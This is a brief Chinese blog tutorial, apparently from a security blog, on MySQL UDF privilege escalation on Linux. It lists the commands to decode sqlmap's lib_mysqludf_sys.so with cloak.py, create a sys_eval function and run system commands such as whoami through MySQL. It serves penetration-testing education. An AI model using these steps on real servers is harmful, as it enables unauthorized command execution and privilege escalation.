目录

udf提权(Linux系统)
udf提权(Linux系统)

access_time
brush 653个字
local_library 217
local_offer Linux提权

如果我们拿到的webshell权限较低,但是如果mysql是以高权限运行的,我们可以用mysql udf提权。

拿到webshell后先弹个shell到msf

图片.png

拿到phpmyadmin的路径

图片.png

查一下插件路径


图片.png

对于udf文件,在sqlmap工具中自带就有,只要找对应操作系统的版本即可

我们要对udf文件进行解码

cd /usr/share/sqlmap/extra/cloak/ 
python cloak.py -d -i /usr/share/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so_

其中,lib_mysqludf_sys.so_是原文件,lib_mysqludf_sys.so是解码后的文件

图片.png

把lib_mysqludf_sys.so传到插件目录

图片.png

利用第上传的lib_mysqludf_sys.so文件,创建一个MySQL函数sys_eval

create function sys_eval returns string soname "lib_mysqludf_sys.so"

执行系统命令

select sys_eval('whoami')


图片.png

udf linux.rar


#如无特别声明,该文章均为 原创,转载请遵循 署名-非商业性使用 4.0 国际(CC BY-NC 4.0) 协议,即转载请注明文章来源。
#最后编辑时间为: 2022-08-20 00:49:33



create 添加新评论

请先登陆后再发表评论